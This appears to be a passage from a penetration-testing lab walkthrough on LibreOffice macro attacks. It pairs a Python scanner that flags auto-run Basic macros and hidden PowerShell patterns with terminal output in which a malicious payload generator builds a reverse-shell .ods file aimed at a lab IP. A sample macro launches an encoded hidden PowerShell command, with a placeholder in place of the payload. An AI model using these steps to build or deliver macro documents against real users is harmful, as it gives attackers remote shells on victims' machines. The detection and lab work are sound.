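SUSPICIOUS_PATTERNS = [
    r"\bShell\s*\(",           # Shell() launches an external command
    r"powershell(\.exe)?",     # hands off to PowerShell
    r"-e(nc|ncodedcommand)?\s",  # encoded-command switch
    r"-w\s+hidden",            # hidden window
    r"cmd\.exe",
]


def find_basic_modules(zf):
    """Return {entry_name: basic_source} for every Basic module in the archive.
    script-lb.xml / script-lc.xml are library manifests, not code, so skip them."""
    modules = {}
    for name in zf.namelist():
        if not (name.startswith("Basic/") and name.endswith(".xml")):
            continue
        if name.endswith(("script-lb.xml", "script-lc.xml")):
            continue
        root = ET.fromstring(zf.read(name))
        modules[name] = "".join(root.itertext())  # text of <script:module> is the source
    return modules


def find_document_event_handlers(zf):
    """Return (event_name, href) pairs bound in content.xml; dom:load means 'on open'."""
    if "content.xml" not in zf.namelist():
        return []
    root = ET.fromstring(zf.read("content.xml"))
    tag = "{%s}event-listener" % NS["script"]
    return [(el.get("{%s}event-name" % NS["script"], ""),
             el.get("{%s}href" % NS["xlink"], "")) for el in root.iter(tag)]


def scan_ods(data):
    """Scan .ods bytes; verdict is True when a module matches an indicator or a
    document-scoped macro is bound to the open event."""
    findings = {"modules": [], "suspicious": [], "on_open_handlers": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        modules = find_basic_modules(zf)
        findings["modules"] = sorted(modules)
        for name, src in modules.items():
            for pat in SUSPICIOUS_PATTERNS:
                if re.search(pat, src, re.IGNORECASE):
                    findings["suspicious"].append((name, pat))
        for event, href in find_document_event_handlers(zf):
            if event == "dom:load" and href.startswith("vnd.sun.star.script:"):
                findings["on_open_handlers"].append(href)
    findings["verdict"] = bool(findings["suspicious"] or findings["on_open_handlers"])
    return findings


def build_sample_ods(basic_source, bind_on_open):
    """Constructed test data: a minimal .ods-like zip with one Basic module
    (Standard/Module1) and, optionally, an on-open binding to its Main sub."""
    module_xml = ('<?xml version="1.0" encoding="UTF-8"?>'
                  '<script:module xmlns:script="http://openoffice.org/2000/script" '
                  'script:name="Module1" script:language="StarBasic">'
                  + escape(basic_source) + '</script:module>')
    listener = ('<script:event-listener script:event-name="dom:load" script:language="ooo:script" '
                'xlink:href="vnd.sun.star.script:Standard.Module1.Main?language=Basic&amp;location=document" '
                'xlink:type="simple"/>') if bind_on_open else ""
    content_xml = ('<?xml version="1.0" encoding="UTF-8"?>'
                   '<office:document-content xmlns:office="%s" xmlns:script="%s" xmlns:xlink="%s">'
                   '<office:scripts><office:event-listeners>%s</office:event-listeners></office:scripts>'
                   '<office:body><office:spreadsheet/></office:body></office:document-content>'
                   % (NS["office"], NS["script"], NS["xlink"], listener))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.spreadsheet")
        zf.writestr("Basic/Standard/Module1.xml", module_xml)
        zf.writestr("content.xml", content_xml)
    return buf.getvalue()


# Constructed macro in the shape of the one on this page, with a placeholder payload.
SAMPLE_MACRO = ('REM ***** BASIC *****\nSub Main\nDim str as String\nstr = ""\n'
                'str = str + "cmd.exe /C powershell.exe -nop -w hidden -e <BASE64_PAYLOAD_PLACEHOLDER>"\n'
                'Shell(str)\nEnd Sub\n')
BENIGN_MACRO = 'Sub Main\nMsgBox "hello"\nEnd Sub\n'

if __name__ == "__main__":
    print(scan_ods(build_sample_ods(SAMPLE_MACRO, bind_on_open=True)))
    print(scan_ods(build_sample_ods(BENIGN_MACRO, bind_on_open=False)))
```

Any document-scoped macro bound to dom:load is flagged on its own, without needing a pattern hit in the source: auto-run on open is the property that makes the trigger in this walkthrough work, so it deserves a look even when the Basic text is obfuscated or split across many string concatenations, as the chunked payload above is.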
Libre Office 2 (.ods)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ git clone https://github.com/0bfxgh0st/MMG-LO
Cloning into 'MMG-LO'...
remote: Enumerating objects: 226, done.
remote: Counting objects: 100% (135/135), done.
remote: Compressing objects: 100% (93/93), done.
remote: Total 226 (delta 71), reused 75 (delta 40), pack-reused 91 (from 1)
Receiving objects: 100% (226/226), 647.39 KiB | 5.44 MiB/s, done.
Resolving deltas: 100% (111/111), done.
Using a LibreOffice malicious payload generator
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ python3 MMG-LO/mmg-ods.py windows 192.168.45.153 8000
[+] Payload: windows reverse shell
[+] Creating malicious .ods file
Done.
Malicious .ods file generated